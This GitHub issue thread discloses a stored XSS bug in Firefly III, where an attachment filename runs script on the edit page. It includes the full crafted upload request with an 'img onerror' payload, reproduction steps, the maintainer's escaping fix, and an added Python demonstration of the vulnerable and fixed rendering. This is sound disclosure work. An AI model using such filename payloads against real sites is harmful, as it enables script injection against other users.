
Stored XSS in filename #2337

Closed
dayn1ne opened this issue Jul 16, 2019 · 4 comments
Labels
bug Verified and replicated bugs and issues. fixed Bugs that are fixed (in a coming release).

Comments

@dayn1ne

dayn1ne commented Jul 16, 2019

Description
The current version of Firefly III (4.7.17.2) is vulnerable to stored XSS due to a lack of filtering of user-supplied data in file names. A malicious attacker can upload a specially crafted image whose name contains JavaScript code. The malicious JavaScript code will be executed when a user edits this attachment (http://firefly.host/attachments/edit/$file_id$).

Note that this file can only be created on Linux; alternatively, you can edit the filename field in a local proxy (e.g. Burp Suite).

If you want to edit the request, you should change this part of it, namely the filename part:

Content-Disposition: form-data; name="attachments[]"; filename="<img src=x onerror=alert(document.domain)>"
Content-Type: image/jpeg

Request

POST /transactions/update/3 HTTP/1.1
Host: firefly.host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------130053325118313125241968558600
Content-Length: 2580
Cookie: firefly_session=<Your session cookie here>
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="_token"

<Your token here>
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="id"

3
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="what"

withdrawal
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="description"

lol
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="source_id"

1
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="destination_name"


-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="amount"

1
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="amount_currency_id_amount"

1
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="native_amount"

1
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="source_amount"

1
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="destination_amount"

1
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="date"

2019-07-15
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="budget_id"

1
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="category"


-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="tags"

lol
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="interest_date"


-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="notes"


-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="attachments[]"; filename="<img src=x onerror=alert(document.domain)>"
Content-Type: image/jpeg

1

-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="source_account_currency"

1
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="destination_account_currency"

0
-----------------------------130053325118313125241968558600--

Steps to reproduce

  1. Download the attached zip file and extract the image (it only works on Linux because of the characters in the filename).
  2. Create a new transaction or update an existing one and upload the file.
  3. After the attachment is uploaded, go to the attachment page and click to edit this file.

PoC image: Screenshot 2019-07-16 at 12 38 14 (screenshot attachment)

Image for testing: xss_file_name_file.zip (attachment)

@JC5
Member

JC5 commented Jul 16, 2019

Thanks, I'll pick it up tonight.

@JC5
Member

JC5 commented Jul 16, 2019

Fixed by escaping the file name. I'll push a fix later tonight.
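The two halves of this thread, the crafted multipart request in the report and the "escape the file name" fix in the comment above, are reproduced end to end in the following added example. It is not Firefly III code and not the maintainer's patch: the multipart builder and parser, the boundary string, the two `render_edit_page_*` templates and the `script_capable_tags` check are all constructed here to show the mechanism. It builds the upload body with the filename from the report, extracts the filename the way a server would, and renders it into a stand-in "edit attachment" page unescaped (the bug) and HTML-escaped (the fix), then parses the rendered HTML to show that only the unescaped version yields an element with an event handler.

```python
"""Stored XSS via multipart filename: PoC request, server-side extraction, and the escaping fix.

Added example, not Firefly III's own code. The templates below are stand-ins for
whatever view printed the attachment name; the boundary and field values are constructed.
"""
import html
import re
from html.parser import HTMLParser

BOUNDARY = "----ConstructedBoundary130053325118"          # constructed, any token works
PAYLOAD_NAME = "<img src=x onerror=alert(document.domain)>"  # filename from the report above


def build_multipart(fields, file_field, filename, content, content_type="image/jpeg", boundary=BOUNDARY):
    """Build a multipart/form-data body like the browser (or Burp) sends, with an arbitrary filename."""
    lines = []
    for name, value in fields.items():
        lines += [f"--{boundary}", f'Content-Disposition: form-data; name="{name}"', "", value]
    lines += [f"--{boundary}",
              f'Content-Disposition: form-data; name="{file_field}"; filename="{filename}"',
              f"Content-Type: {content_type}", ""]
    # The CRLF after the blank header line, then the raw file bytes, then the closing delimiter.
    return "\r\n".join(lines).encode() + b"\r\n" + content + b"\r\n" + f"--{boundary}--\r\n".encode()


def _param(header, key):
    """Pull key="value" out of a Content-Disposition header; anchored so name= never matches filename=."""
    m = re.search(r'(?:^|;)\s*' + re.escape(key) + r'="([^"]*)"', header)
    return m.group(1) if m else None


def parse_multipart(body, boundary=BOUNDARY):
    """Minimal multipart/form-data parser: returns dicts with name, filename, content_type, content.

    Browsers percent-encode '"' and newlines in filenames, but nothing stops a proxy user from
    sending any bytes, which is exactly what the report relies on. The filename is returned raw.
    """
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:            # [0] is the preamble before the first delimiter
        if chunk.startswith(b"--"):                # "--boundary--" closes the body
            break
        chunk = chunk.removeprefix(b"\r\n")
        head, _, content = chunk.partition(b"\r\n\r\n")
        content = content.removesuffix(b"\r\n")    # the CRLF before a delimiter belongs to the delimiter
        headers = {}
        for line in head.decode("utf-8", "replace").split("\r\n"):
            k, _, v = line.partition(":")
            headers[k.strip().lower()] = v.strip()
        disp = headers.get("content-disposition", "")
        parts.append({"name": _param(disp, "name"), "filename": _param(disp, "filename"),
                      "content_type": headers.get("content-type"), "content": content})
    return parts


def render_edit_page_vulnerable(filename):
    """Stand-in for a template that prints the stored filename into HTML unescaped (the reported bug)."""
    return f"<h1>Edit attachment {filename}</h1>"


def render_edit_page_fixed(filename):
    """Same page with the filename HTML-escaped; quote=True also covers double-quoted attribute context."""
    return f"<h1>Edit attachment {html.escape(filename, quote=True)}</h1>"


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def script_capable_tags(rendered):
    """Return (tag, attrs) for every element a browser would run script from: <script> or any on* handler."""
    p = _TagCollector()
    p.feed(rendered)
    p.close()
    return [(t, a) for t, a in p.tags if t == "script" or any(k.startswith("on") for k in a)]


def demo():
    """Replay the report: upload with the crafted name, store it, render the edit page both ways."""
    body = build_multipart({"_token": "<Your token here>", "description": "lol"},
                           "attachments[]", PAYLOAD_NAME, b"1")
    file_part = next(p for p in parse_multipart(body) if p["filename"] is not None)
    stored = file_part["filename"]                 # what the app would persist as the attachment name
    return {"stored_filename": stored,
            "vulnerable": script_capable_tags(render_edit_page_vulnerable(stored)),
            "fixed": script_capable_tags(render_edit_page_fixed(stored))}


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The fix works because the browser parses `&lt;img ...&gt;` as text, so no `img` element and no `onerror` handler ever exist; a regex that merely looks for the string `onerror=` would flag both versions, which is why the check above parses the output instead. Escaping has to match the output context: `html.escape(..., quote=True)` is right for element text and double-quoted attributes, but a filename placed inside a JavaScript string or a URL would need that context's encoding instead.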

@JC5 JC5 closed this as completed in 17a66b3 Jul 16, 2019
@JC5 JC5 added bug Verified and replicated bugs and issues. fixed Bugs that are fixed (in a coming release). labels Jul 16, 2019
@JC5
Member

JC5 commented Jul 16, 2019

@JC5 JC5 reopened this Jul 16, 2019
@dayn1ne
Author

dayn1ne commented Jul 17, 2019

Confirmed, the bug is not reproducible anymore.

@JC5 JC5 closed this as completed Aug 3, 2019
@lock lock bot locked as resolved and limited conversation to collaborators Jan 19, 2020